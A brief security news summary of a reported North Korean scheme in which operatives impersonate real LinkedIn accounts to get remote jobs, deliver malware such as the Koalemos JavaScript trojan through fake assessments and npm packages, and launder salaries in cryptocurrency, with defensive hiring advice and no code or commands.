North Korean IT operatives are applying to remote jobs using real LinkedIn accounts they impersonate, with fake profiles that include verified workplace emails and identity badges, Security Alliance post said.
KEY FACTS
- Incident DPRK operatives impersonate real LinkedIn accounts to apply for remote positions
- Tactics Fraudulent profiles include workplace email verification and identity badges to appear legitimate
- Impact Goals include revenue generation, espionage and possible extortion
- Mitigation Validate candidate email control and require direct account verification on LinkedIn
The scheme is part of a long running operation in which operatives pose as remote workers to secure jobs under stolen or fabricated identities. The activity seeks steady revenue streams, access to sensitive data and opportunities to demand ransoms in some cases.
Attackers use fake hiring flows that ask candidates to perform skill assessments and run commands that can execute malicious code. Techniques observed include hosting command and control elements on blockchain smart contracts and using editor task files to deliver JavaScript payloads that install malware.
A modular JavaScript remote access trojan called Koalemos has been delivered through malicious npm packages and a loader. The malware runs a beacon loop to retrieve tasks, supports filesystem operations and discovery commands, and uses DNS based gating and engagement date checks to complicate detection.
After salaries are paid, funds are converted to cryptocurrency and laundered through chain hopping, token swaps, decentralized exchanges and bridge protocols. Defenders are advised to list official contact channels, confirm candidate email ownership and ask candidates to connect on LinkedIn to verify account control. The overall scope of impacted companies remains unclear.
WHY IT MATTERS
Organizations hiring remote technical staff risk credential theft, loss of intellectual property and unauthorized access to code and infrastructure. The activity also creates a revenue stream that can be converted to cryptocurrency and moved offshore.